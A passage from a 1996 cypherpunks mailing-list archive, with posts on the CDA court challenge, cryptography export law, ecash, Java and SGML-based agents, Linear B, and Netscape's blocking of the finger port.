I'll bet anyone five bucks that Grey Flannel is from the NSA.

The other pro-CDA witness is almost certainly Dan Olsen, a Mormon who
is the head of the computer science department at Brigham Young
University and the incoming director of the Human Computer Interaction
Institute at Carnegie Mellon University. (The HCI Institute at CMU is
known as a dumping ground for faculty who can't make the cut in the
justly-renowned CMU computer science department.)

Of course, CMU is the school that is considering what cyberlibertarian
attorney Harvey Silverglate calls an "Orwellian speech code," and
erotic USENET newsgroups are still banned from almost all campus
computers. Since CMU spawned Marty Rimm, who tried to sell his
unethical research to the DoJ and whose study helped pass the CDA,
it's appropriate that CMU affiliates are helping the DoJ defend the
damned CDA after all.

Today's testimony ended our case, with the exception of one of our
witnesses who couldn't make it earlier. Albert Vezza is the associate
director of MIT's Lab for Computer Science and a PICS guru who will be
testifying for us on April 12 or April 15. With the exception of
Vezza, those two days will be devoted to the DoJ's arguments alleging
that the CDA is constitutional and should be upheld by the court.

Stay tuned for more reports.


-----------------------------------------------------------------------------

We're back in court on 4/12, 4/15, and 4/26. The DoJ will reveal the
identity of their expert witnesses on 4/3 or 4/8.

Mentioned in this CDA update:
  Howard Rheingold         <http://www.well.com/~hlr/>
  CMU and the Rimm study   <http://www.cs.cmu.edu/~declan/rimm/>
  CMU's HCI Institute      <http://www.cs.cmu.edu/~hcii/>
  Dan Olsen at BYU         <http://www.cs.byu.edu/info/drolsen.html>
  Censorship policy at BYU <http://advance.byu.edu/pc/releases/guidelines.html>
  Censorship at CMU        <http://joc.mit.edu/>
  USENET censorship at CMU <http://www.cs.cmu.edu/~kcf/censor/>
  HotWired / WIRED         <http://www.hotwired.com/>
  PICS information         <http://www.w3.org/pub/WWW/PICS/>

These and previous CDA updates are available at:
  <http://fight-censorship.dementia.org/top/>
  <http://www.epic.org/free_speech/censorship/lawsuit/>

To subscribe to the fight-censorship list, send "subscribe" in the
body of a message addressed to:
  fight-censorship-request@andrew.cmu.edu
 
Other relevant web sites:
  <http://www.eff.org/>
  <http://www.aclu.org/>
  <http://www.cdt.org/>

-----------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 4 Apr 1996 15:15:04 +0800
To: cypherpunks@toad.com
Subject: Re:  Disclosure of Public Knowledge to Foreigners
Message-ID: <199604031545.HAA12637@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: tcmay@got.net (Timothy C. May)
> "There is a reasonable chance the Supreme Court would see the overall
> absurdity of a situation where the knowledge is freely available to 200
> million adult Americans, with no restrictions whatsover on publication,
> discussion, etc., and yet uttering this knowledge in front of a foreigner
> is a crime."

It would be good if this happened.  Yet unfortunately I think it is
unlikely.  Absurdity is not necessarily sufficient to invalidate a law.
Especially in this case, if you read the judge's decision (at <URL:
http://www.qualcomm.com/people/pkarn/export/decision.html >) you see that
this issue is one which is "hands off" for the judiciary.

The question of designating whether items should be on the Munitions List
has been found both by the courts and by the legislature to be
"non-justiceable", something which the courts can't review.  It is
strictly in the purview of the legislative branch, which passes the law,
and the executive branch, which sets the policy and creates the list.
Courts are required to refrain from second-guessing them.

Of course this doesn't totally close the door, and if serious
constitutional questions arise, the court can consider this.  Phil Karn
attempted to do so, but did not succeed in this case.  Unfortunately
there is clear precedent at the appellate court level that First
Amendment concerns are not violated by export bans.  As long as you can
say whatever you want domestically, the government has a lot of latitude
to prevent you saying things to foreigners, even though that is illogical
in many contexts.

I feel, by the way, that this may soon present another line of attack on
the restrictions.  As the Internet becomes a dominant communications
medium, it will become more true than ever that these regulations have a
chilling effect on all communications relating to cryptography.  I can't,
right now, post crypto source code to this list without breaking the law.
Nor can I post it to sci.crypt.  How then can I participate in discussing
these matters in detail on the Internet?  Maybe I could put the material
on an export-restricted disk somewhere, but that does not allow for the
dynamic give-and-take which is so much a part of internet discussion.

So, in the context of the net, export controls are de facto content
controls on domestic discussion.  For now, maybe being unable to speak
in detail about crypto on the net isn't that big a handicap.  But in a
few years, Internet communication will be a big part of everyone's lives
(arguably) and being unable to present certain information will produce a
stronger First Amendment violation.

A couple more comments on Tim's message:

> Interestingly, according to a friend of mine (Mike Ward, of San Jose), it
> is much cheaper (or was when he did the analysis a couple of years ago) to
> have a chunk of text entered two or more times by humans and then XORed for
> errors than to OCR the text. This form of error correction--redundant
> entry--would presumably work well for Schneier's code, for example.

I can certainly believe it after reading about Phil's efforts.  And as I
point out, he actually did have a secretary type it in.  It is
disturbing, though, that the book had errors in it.  I wonder if it was
typeset by hand?  Is that possible in this day and age?

> What we are really about to run into is the "export of knowledge" issue,
> which I think the Constitution will have some pretty important things to
> say about. (It has long been the case that certain armaments knowledge, and
> atomic secrets as per the Atomic Energy Act, were restricted. But this
> knowledge was _also_ not in the public domain. There have not been many
> cases that I know of where knowledge was freely discussable within, say,
> the United States, by any citizens (and maybe others, such as permanent
> residents, foreign students at colleges, etc.) and yet this knowledge could
> not be "exported" outside the U.S.
> 
> Except with our crypto laws, and some related Munitions Act laws.

Unfortunately, as I noted above, so far no one has been able to come up
with a convincing Constitutional argument, especially in the face of the
Posey and Edler precedents, which are discussed by the judge in Phil's
case, and for which I have some excerpts at <URL:
http://www.portal.com/~hfinney/cryp_export2.html >.

I think the real solution frankly is to get the laws changed.  If the
laws are absurd, people should be taught about them, and they should
pressure their legislators to change them.  This is not an attractive
solution because it implies a lot of work and a long, slow process.  But
in the long run it will be better to establish a national consensus about
how to deal with these issues.  Then it will be harder for government to
place new restrictions in place.  I think the recent legislative action
reflects the beginnings of this process.  It may not succeed this year,
but hopefully in a few years, as more people get on the net, it will gain
momentum.

Ironically, the termination of the case again Phil Zimmermann may hurt
progress in this area.  Unfair and unjustified as the pending charges
against Phil were, they did at least raise people's consciousness about
the problems in current policies.  Phil did an excellent job of keeping
these issues in front of people in all sorts of media.

Now that there is no longer an articulate victim of unfair export laws
it may be harder to keep people thinking about the problem.  Perhaps we
need a new volunteer...

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Date: Thu, 4 Apr 1996 15:15:20 +0800
To: cypherpunks@toad.com
Subject: Re: Navajo code-talkers
Message-ID: <9604031922.AA3658@smtp1.chipcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: grafolog @ netcom.com (Jonathon Blake) @ UGATE    
> << It's one of the status languages to study, if you are
> a new ager --- along with Ancient Mayan, linear B and
> Egyptian Hieroglyphics.  >> 

Well, hieroglyphics and linear b are writing systems, not languages.
And Linear B is Greek (though it takes effort to read it even if
you know your Homer...)

 paul

!-----------------------------------------------------------------------
! Paul Koning, NI1D, C-24183
! 3Com Corporation, 1-3A, 118 Turnpike Road, Southborough MA 01772 USA
! phone: +1 508 229 1695, fax: +1 508 490 5873
! email: paul_koning@isd.3com.com  or  paul_koning@3mail.3com.com
! Pgp:   27 81 A9 73 A6 0B B3 BE 18 A3 BF DD 1A 59 51 75
!-----------------------------------------------------------------------
! "Be wary of strong drink.  It can make you shoot at tax collectors
!  -- and miss!"
!                -- Robert A. Heinlein, "The Notebooks of Lazarus Long"
!                   in "Time Enough for Love"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "D.A. Wagner" <daw27@newton.cam.ac.uk>
Date: Thu, 4 Apr 1996 00:11:27 +0800
To: jamesd@echeque.com
Subject: Re: Chaumian ecash without RSA
In-Reply-To: <199604030633.WAA06128@mail1.best.com>
Message-ID: <199604031057.GAA07040@jeans.newton.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


jamesd@echeque.com writes:
>                                             we cannot have payee 
> anonymity with your protocol.

Doh!  You are quite right.  Good observation.

Thanks for setting me straight.

I think I'll go back to lurk-mode again,
-- Dave Wagner




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 4 Apr 1996 11:05:23 +0800
To: cypherpunks@toad.com
Subject: CMU/BYU administrator helps the DoJ defend the CDA
Message-ID: <IlMetqu00YUvIA9OVt@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


[Dan Olsen was hired as the director of the Human Computer Interaction
Institute at Carnegie Mellon University earlier this year. --Declan]

--------------------------------------------------------------------------

Date: Wed, 3 Apr 1996 09:12:20 -0700
To: "Declan B. McCullagh" <declan+@CMU.EDU>
From: olsen@cs.byu.edu (Dan Olsen)
Subject: Re: Question

>Will you be testifying on behalf of the DoJ in the CDA lawsuit in
>Philadelphia? Have you been at all involved with the case?
>
Yes I am and yes I have.

-------------
Dan R. Olsen Jr.
Computer Science Department, Brigham Young University
Provo, UT 84602
phone: 801-378-2225  fax: 801-378-7775

--------------------------------------------------------------------------

Date: Wed, 3 Apr 1996 09:35:39 -0700
To: "Declan B. McCullagh" <declan+CMU.EDU>
From: olsencs.byu.edu (Dan Olsen)
Subject: Re: Question

>Dan: Thanks for replying. What are you planning to testify about? What
>are your personal feelings about the CDA? How were you contacted?
>
I understand your interest, having read your home page. I would be happy to
go over all of this with you when I actually move to CMU in July and the
case has completed. Until the case is resolved, it would be inappropriate
to discuss it.

Thanks for your interest

-------------
Dan R. Olsen Jr.
Computer Science Department, Brigham Young University
Provo, UT 84602
phone: 801-378-2225  fax: 801-378-7775






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 4 Apr 1996 16:55:08 +0800
To: cypherpunks@toad.com
Subject: Re: What backs up digital money?
Message-ID: <199604032050.MAA02754@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: rah@shipwright.com (Robert Hettinga)
> When money finally goes onto the net, and never comes back, the digital
> bearer certificates we call ecash will be a currency. Until then, it's just
> a script.
> 
> Or is it an interestless bond? ;-).

I'm not sure exactly what you mean by money "going onto the net and never
coming back".  Is this just a matter of there being a wider variety of
useful things to buy on the net?  Or do you mean that people who receive
ecash will not want to deposit in their bank accounts, but just turn
around and spend it?

I will point out that with regular currency, most merchants who receive
it just deposit it at the bank, save for a bit passed out as change.
Supermarkets don't actually take the cash their customers give them and
hand it to their suppliers.  They deposit it and pay with checks.  So
the "life cycle" of a $20 bill is pretty much from the bank, to the
customer, to the merchant, and back to the bank, only to repeat the
cycle.  Ecash, it seems to me, is already able to circulate to this
extent, although of course it is not yet widely used.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Anderson <ota+@transarc.com>
Date: Thu, 4 Apr 1996 16:38:26 +0800
To: vznuri@netcom.com
Subject: Re: java: vending machine software (long)
In-Reply-To: <199603282211.OAA15109@netcom14.netcom.com>
Message-ID: <QlMfpa2SMV0_1o3040@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Vladimir Z. Nuri" <vznuri@netcom.com> writes:
> Java seems to be catching on in a big way (only a few months ago,

These are important ideas.  I found them explored very nicely
in several papers written by Drexler and Miller (circa 1988!).  They
are available in the collection "Ecology of Computation (1988)" and
via the Agorics Home page (http://www.webcom.com/~agorics).

It seems that with the Web and Java now widely available the technical
means to implement these ideas are getting visibly closer.

> when one thinks about this, I think it becomes clear that we are going
> to see many, many new standards for code communication in the future.

The most interesting thing I've heard along these lines was described
in a talk by Matthew Fuchs.   He suggested the idea of using something
like SGML (of which HTML is a subset) to communicate between smart
agents.  The idea is to provide a machine understandable equivalent
of a web form which could be used to send info back and forth.  In
this application display instructions are not important, what is
important is the meaning assigned to the keywords.  For example, in
a simple web page you might use <title>, <body>, <author>, <h1>, etc.
The browser knows how display these because for simple documents they
have a well defined meaning, but an automatic document indexer could
also easily find the title and author.

Consider an airline reservation system.  It might support a variety of
commands to answer queries and make reservations.  Clearly once the
*meaning* is in hand, crafting a way to display it would be easy.  So
you have a scheme which can be used with equal facility by
either a human or a machine.  This allows for smooth transition from
human mediated to automated steps in a larger project (e.g. plan a trip
visiting these five cities) where some parts have been automated (e.g.
airline reservations) and other parts have not (say, hotel reservations).

Further, the system can be built out of layers of objects that give
meanings to various keywords.  Consider a bunch of keywords and
associated Java applets that understand dates and times (they know about
timezones and daylight savings and weekends and so forth).  Another
level of objects knows how to manage schedules, and still another
layer knows about travel arrangements.  The system used by a particular
airline uses all these objects to provide an interface for communicating
with customers (or their automated agents).

Java seems ideal suited to be the active lubricant in such a system.

Ted Anderson

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMWK8PwGojC9e/wyBAQFuVAQA0Z4qjeIs2j8bxEYqaxuwQLdw49oXTX5a
sN9L75sy8AmdMJjDfBuo8Kij7Iyx/ZrexJp/lsGS0pC76OpafNs0nfckQsblmrA5
9BzHe+PmDgPtJOvdCJYnR624PuioGihD/J8l2YZFf7/OfaRCXW2q/HvcBeuDWseS
zSIumBmiObo=
=F+Zv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 4 Apr 1996 19:08:21 +0800
To: Ted Anderson <ota+@transarc.com>
Subject: Re: java: vending machine software (long)
In-Reply-To: <QlMfpa2SMV0_1o3040@transarc.com>
Message-ID: <199604032126.NAA05470@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TA:
>The most interesting thing I've heard along these lines was described
>in a talk by Matthew Fuchs.   He suggested the idea of using something
>like SGML (of which HTML is a subset) to communicate between smart
>agents.
>
..
>Further, the system can be built out of layers of objects that give
>meanings to various keywords.  Consider a bunch of keywords and
>associated Java applets that understand dates and times (they know about
>timezones and daylight savings and weekends and so forth).  Another
>level of objects knows how to manage schedules, and still another
>layer knows about travel arrangements.  The system used by a particular
>airline uses all these objects to provide an interface for communicating
>with customers (or their automated agents).
>
>Java seems ideal suited to be the active lubricant in such a system.

yes, I didn't get into some of what you are talking about in my essay,
but that's something very significant that is going on right under
our noses this minute: the formatting of vast kinds of data into
SGML systems.  I have a book called "writing SGML DTDS". it seems
pretty boring-- it talks about how to create tags and all that, and
doesn't give a "big picture scenario" of what this technology can
lead to-- which is unfortunate, because the end result of it it
all is extremely significant.

the framework I like to use to describe this technology is to portray
it as the steps that are necessary to create the "paperless office".
this was a holy grail that computers were supposed to deliver many
years ago, and many have noted the irony that the exact opposite seems to have 
happened in that computers are generating mountains of paper.

it is clear that to achieve the paperless office, many, many standards
have to be devised an adhered to for the formatting of information in
documents.  SGML is intended to be a high-level total overview 
architecture that can encompass all document definitions created by anyone,
and allows embedding of different formats within formats, so that a 
massive hierarchy of interchangeable formats can be constructed.

EDI or electronic data interchange format for billing that many companies
are using (I don't know anything about it I assure you) is an example
of the kind of standardization that is gradually taking place.

whether Java is the "ideal language" to handle all this I think remains
to be seen. I expect amny new languages and concepts to be developed
that focus on the creation/manipulation of document standards. an
object-oriented paradigm will be important in this endeavor, though,
I agree. your idea of relating "documents" and "objects" I definitely
expect to see as a strong emerging paradigm. 

a document will be thought
of as an "object" whose local data are the blanks in the form, and the
document can perform some operations on that data using its "methods".
also the hierarchy you described is very nicely imposed on documents:
a very general "bill" class might have only a "payer/payee/amount/desc"
fields, and all kinds of comkpanies would create their unique 
subclasses that describe their own internal company forms. general
methods would be overridden, etc.

what this is all moving toward, imho, is a kind of  "information assembly
line". imagine every task in the world today that involves nothing
but shuffling information from one form to another, in a way that 
requires "logic" but not human intelligence (i.e. could be programmed
if the data were available in digital form and inputs/outputs were hooked
up properly). I predict that wherever this is the case, there is going
to be a gradual motion toward automization of these processes. 

also note that the concept of an "object" tends to become far less
local and more universal. there may be "objects" "out there" in cyberspace
that you can manipulate and subclass as if they were sitting on your
own computer. but because they are so universal, other companies or
individuals anywhere on the planet may be using the same objects. at
various levels in the hierarchies of data, it is all interchangeable
and related.

this all suggests an amazing new collaboration between 
companies to create standards where everyone benefits. in today's
system, companies tend to behave as if they are isolated entities who
all survive at the expense of the other. I believe this concept will
largely dissipate as companies see themselves as fitting into special
places in a characteristic "niche" of the ecosystem of business. they
will see themselves as components in a massive computing system that
interface to each other via cyberspace. cyberspace becomes then a
kind of nervous system for an entire nation (which it already is,
just not as overtly).

it is quite surprising that given how far we are into the Information Age
how much information and data has resisted the gradual trend toward
automization. many, many companies are interested in "reengineering"
for this reason: they want to take full advantage of technology, but
realize how incredibly difficult this is to do when you have 
decades of "status quo" type procedures calcified into the system that
tend to be hostile & resistant towards automization.
the job of turning documents into data is actually quite herculean--
we have a tendency to see it as trivial but the amount of labor involved
in "conversion" can be enormous. the payoffs are very significant once
you have converted your atoms to bits, though.

the corporations of the future I imagine will have incredible fluidity
without the cost in lack of security. in other words, they will
be able to dynamically "re" configure themselves to suit the instant
because they will have highly organized and malleable 
"central nervous systems" that govern the information flow within them.
these systems will be built out of massive hierachies of document
format standards and enormous, seamless flows of data.

someday, I think every form that is in existence will have an
electronic description similar to SGML syntax, and every aspect of
data shuffling in companies and between them that can be automated,
will be.  its going to be quite awhile before this achieved however.

thanks for your reactions to the writing, which have caused a whole new
avalanche of neurons to fire.. <g>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Thu, 4 Apr 1996 15:22:32 +0800
To: trei@process.com
Subject: Re: Canada's ISO standards body?
Message-ID: <v02140b00ad88b40881e5@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 AM 4/3/96, Peter Trei is rumored to have typed:
>  Simon Spero <ses@tipper.oit.unc.edu wrote:
>  > I don't think v3 has been balloted yet - that gives you a chance to
>  > explore one of the more amusing twists of OSI standardisation- you can
>  > get copies for free of most drafts from the editor right up until it gets
>  > standardised. Silly, isn't it.
>
> Haven't located it yet.

ftp://hesiod.communities.com/pub/mccoy/ansi-x9.ps   I also have a PDF version
of the draft as ansi-x9.pdf, and the certificate DAM in the file certdam.ps.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Thu, 4 Apr 1996 18:26:48 +0800
To: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Subject: Re: Navajo code-talkers
Message-ID: <v02140b01ad88b56fd647@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:22 AM 4/3/96, Paul_Koning is rumored to have typed:

> >From: grafolog @ netcom.com (Jonathon Blake) @ UGATE
> > << It's one of the status languages to study, if you are
> > a new ager --- along with Ancient Mayan, linear B and
> > Egyptian Hieroglyphics.  >>
>
> Well, hieroglyphics and linear b are writing systems, not languages.
> And Linear B is Greek (though it takes effort to read it even if
> you know your Homer...)

Linear B is Minoan, and knowing Greek helps in understanding what things
decipher to, but it predates the Greek alphabet by several centuries so
even if you knew Homer personally you would have had trouble reading it.

ObCrypto:  Unlike Egyptian hieroglyphics, we have yet to find a Rosetta
Stone equivalent for Linear B (or Linear A, it's predecessor, although I
seem to remember Linear A being more akin to ideograms)  Most of what is
known about Linear B was inferred using a sort of linguistic cryptanalysis,
in fact there was a paper in one of the Crypto proceedings from the mid-80s
which described some of the methods employed.

ObMoreDeadLanguages: Does anyone know if there are Unicode character sets
for Sanskrit or hieroglyphics?  How exactly does one get a proposed
character set approved/ratified if not?

jim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Administrator" <Administrator_at_DCACINTS@dca.com> (by way of John Deters <jad>)
Date: Thu, 4 Apr 1996 13:48:02 +0800
To: cypherpunks@toad.com
Subject: Re: software with "hooks" for crypto
Message-ID: <2.2.32.19960403215138.0032ece4@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 02:31 PM 4/2/96 -0800, you wrote:
>Hello all,
>
>I'm trying to figure out exactly what the laws are regarding the export of
>software which contains "hooks" for PGP.  In various forms, I've heard
>that it's not the ITAR which prevents this, but more a "suggestion" by
>the NSA that we "shouldn't do it."  Does anyone have any pointers to
>real legislation/laws regarding this?

There are a number of "PGP Helpers" (If this is Tuesday, it must be PGP) out
there.  These are other PGP front end applications such as Private Idaho,
PGPShell and others that do NOT include PGP, nor do they contain any
encryption code within them.  These applications are all billed as "freely
exportable".  If your software does not contain any encryption code, such
that it simply "invokes" the users separately-obtained-and-installed copy of
PGP, you are not in violation of ITAR.  It sounds like this is what you're
doing with your "hooks for PGP".

I would recommend you visit a couple of these helper application sites and
check out what their authors say about the exportability of their code.  You
might ask them if they have encountered any legal difficulties because their
code is advertised as freely exportable.  Private Idaho is available at
www.eskimo.com/~joelm and (rats) you'll have to hunt PGPShell down yourself.

If you actually include the RSA algorithms, the IDEA algorithm, or any
"cryptographic" code in your software, then yes, you could get in trouble
for exporting it.

Again, remember that I'm not a lawyer and that any legal advice you get from
anyone on the net is worth exactly what you pay for it.

-j, is anyone else finding it harder to say the "Pledge of Allegiance" to
this country these days?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Thu, 4 Apr 1996 18:36:48 +0800
To: "Cypherpunks List" <jimbell@pacifier.com>
Subject: Re: ACM/IEEE Letter on Cryp
Message-ID: <n1383571756.16740@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


The draft bill which currently exists only takes the export controls on
crpyto. The provisions on key escrow, criminal penalities and other problems
are not in there and Burns staff have no intention of letting them in. The
actual bill will be introduced in about 2 weeks.

-dave

--------------------------------------
Date: 4/2/96 2:46 PM
To: Dave Banisar
From: jim bell
At 04:24 PM 4/1/96 -0500, Dave Banisar wrote:
>              Association For Computing Machinery
[address deleted]
>      Institute of Electronics and Electrical Engineers
[address deleted]
>April 2, 1996
[thank heavens it wasn't April 1!]
>Honorable Conrad Burns
>Chairman, Subcommittee on Science, Technology and Space
[etc]
>Dear Chairman Burns:
>
>	On behalf of the nation's two leading computing and engineering 
>associations, we are writing to support your efforts, and the efforts of 
>the other cosponsors of the Encrypted Communications Privacy Act, to 
>remove unnecessarily restrictive controls on the export of encryption 
>technology.  The Encrypted Communications Privacy Act sets out the 
>minimum changes that are necessary to the current export controls on  
>encryption technology.  However, we believe that the inclusion of issues 
>that are tangential to export, such as key escrow and encryption in 
>domestic criminal activities, is not necessary.  The relaxation of 
>export controls is of great economic importance to industry and users, 
>and should not become entangled in more controversial matters.

As far as it goes, and considering that it's from an industry group, this 
sounds like an excellent response to this Burns bill proposal.  (Not "Bill," 
because it's still not available, apparently.)  This response is probably as 
close as we can expect to a repudiation of the Leahy bill.  It still isn't 
clear, though, whether the Burns bill is intended to be just an elimination 
of export controls on encryption, or whether it will contain other provisions.

My question, which still hasn't been answered, is:  "Does this bill exist 
yet?"  The answer is really not inconsequential, because if it _isn't_ at 
least sketched out yet, then that either should give us the opportunity to 
add provisions we want, or alert us that there is still the risk from 
Denning-types of including provisions we don't want.  Either way, action is 
called for, if only action to keep somebody else from taking action.  

I don't have any objection to a bill which merely eliminates export 
requirements on encryption; that would be a substantial step in the proper 
direction.  If that's the best we can do for this session of Congress, I 
hope we can achieve this as a stepping-stone. 


Jim Bell
jimbell@pacifier.com





------------------ RFC822 Header Follows ------------------
Received: by epic.org with SMTP;2 Apr 1996 14:44:17 -0500
Received: from ip17.van1.pacifier.com  by pacifier.com
	(Smail3.1.29.1 #6) with smtp for <banisar@epic.org>
	id m0u4Bhn-0008xuC; Tue, 2 Apr 96 11:25 PST
Message-Id: <m0u4Bhn-0008xuC@pacifier.com>
X-Sender: jimbell@pacifier.com
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 02 Apr 1996 11:24:08 -0800
To: "Dave Banisar" <banisar@epic.org>,
 "Cypherpunks List" <cypherpunks@toad.com>
From: jim bell <jimbell@pacifier.com>
Subject: Re: ACM/IEEE Letter on Crypto




_________________________________________________________________________
Subject: RE>>ACM/IEEE Letter on Crypto
_________________________________________________________________________
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301  *  HTTP://www.epic.org
Washington, DC 20003                *  ftp/gopher/wais cpsr.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kreidl@newrock.com
Date: Thu, 4 Apr 1996 14:50:34 +0800
To: cypherpunks@toad.com
Subject: Digest Version???????
Message-ID: <199604032328.RAA22264@Ultra1.corenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know if I can get a digest version of this???

		(__)
	 	(oo)
	/--------\/
       /  |     ||   <-- Moo.(We live in Wisconsin, the dairy state, get it?)
      /  ||     ||
      *  ||-----||
         ~~     ~~  



Chris (or Richard) Kreidl
kreidl@newrock.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Thu, 4 Apr 1996 19:46:22 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Netscape 2.01 fixes server vulnerabilities by breaking the client...
In-Reply-To: <315C8FCB.2781@netscape.com>
Message-ID: <31633ABF.4487@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves wrote:

> How about limiting URLs on non-blessed ports to, say, 64 alphanumeric
> characters? I'm sure the documentation writers and technical support
> folks would hate you, but it should address these concerns.

This is not good enough. Many people, feeling secure on their side of a
firewall, put proprietary information in their .plan files. Since the
the Navigator is running inside that firewall, we can't give access to
that data to sources coming from outside the firewall. Given the many
ways to construct a URL, the safest was to prevent any access to the
finger port (along with a number of others).

PK
--
Philip L. Karlton		karlton@netscape.com
Principal Curmudgeon		http://home.netscape.com/people/karlton
Netscape Communications

     They that can give up essential liberty to obtain a little
     temporary safety deserve neither liberty nor safety.
		- Benjamin Franklin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sawyer@nextek.com (Thomas J. Sawyer)
Date: Thu, 4 Apr 1996 16:27:34 +0800
To: cypherpunks@toad.com
Subject: Re: CDA Court Challenge: Update #3
Message-ID: <v02130500ad888f390f2e@[206.230.158.144]>
MIME-Version: 1.0
Content-Type: text/plain



>  * The DoJ is trying to draw a distinction between "indecent" images
>    of couples engaged in sexual intercourse and educational
>    "indecent" material that they will claim is not going to be
>    prosecuted under the CDA.

I wonder if they are considering any "artistic" indecent material that
would also not be prosecuted?
Maybe if Playboy remains themselves to "A Pictorial of The Female Body"
then it would be ok.

Just a thought anyway.

Thanks for reading,

Thomas J. Sawyer
sawyer@nextek.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Thu, 4 Apr 1996 18:35:16 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape 2.01 fixes server vulnerabilities by breaking the client...
In-Reply-To: <315C8FCB.2781@netscape.com>
Message-ID: <31636529.167E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Phil Karlton wrote:
> Rich Graves wrote:
> 
> > How about limiting URLs on non-blessed ports to, say, 64
> > alphanumeric characters? I'm sure the documentation writers and
> > technical support folks would hate you, but it should address these
> > concerns.
> 
> This is not good enough. Many people, feeling secure on their side of
> a firewall, put proprietary information in their .plan files. Since
> the the Navigator is running inside that firewall, we can't give
> access to that data to sources coming from outside the firewall. Given
> the many ways to construct a URL, the safest was to prevent any access
> to the finger port (along with a number of others).

Of course, this isn't really a good reason because there's no way to
get the information back out to the other side of the firewall.

As a matter of fact, limiting URLs as Rich suggests might in fact be
good enough.  It's one of the possibilities we'll be looking at for
reenabling finger and whois.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 4 Apr 1996 21:12:27 +0800
To: cypherpunks@toad.com
Subject: e$ Signorage
Message-ID: <v02120d0aad88ab66941d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:50 PM 4/3/96, Hal wrote:


> Or do you mean that people who receive
> ecash will not want to deposit in their bank accounts, but just turn
> around and spend it?

Yes. Or maybe even invest it there. I was just finished a little 800 word
blurb for Wired's Idees Fortes section on, (guess what?) "Geodesic
Capital", which talked about just such a scenario.

I believe money which is never redeemed back at the bank is called
signorage in the currency biz.  Whatever signorage *actually* is, Kawika
Daquio of the ABA (B for "Banking"), the Fed makes $20 billion a year on
it. Not much against a trillion dollar federal budget, but, hey, every
little bit helps...

Stuff that doesn't get returned also useful for other stuff, like the
reputation of the currency. When was the last time someone went in and
cashed in their dollars for gold, or silver, at the Fed? It's legally
impossible now, but the French did it until Nixon stopped it by floating
the dollar, in the early seventies, if you remember, and it used to be done
by normal people all the time. Pierpont Morgan had to bail out  Presedent
Garfield?, Cleveland? with a European treasury bond flotation because there
was a run on the treasury at the turn of the century.

> I will point out that with regular currency, most merchants who receive
> it just deposit it at the bank, save for a bit passed out as change.

Unless, of course, they're in Russia (remember the money plane?), and other
places. That's where that $20MMM comes from, I think, but I'm not sure.

> Supermarkets don't actually take the cash their customers give them and
> hand it to their suppliers.  They deposit it and pay with checks.  So
> the "life cycle" of a $20 bill is pretty much from the bank, to the
> customer, to the merchant, and back to the bank, only to repeat the
> cycle.

Maybe I'm talking about net balances on the net. e$ in circulation overall.
I'm really starting to stretch here, you can tell. My guess is in the old
days before book-entry stuff like credit cards, and even pervasive checking
accounts, cash had to be more physically robust, because it probably stayed
out longer. Remember those old double-eagles? Gold is certainly durable.
More probably people just exchanged worn-out bills for cleaner ones, but
that meant that the money stayed in cash.

> Ecash, it seems to me, is already able to circulate to this
> extent, although of course it is not yet widely used.

Indeed. On both counts. :-).

If my WAG about digital cash certificates eventually replacing demand
deposits comes about (my claim is that they'll eventually be cheaper, and
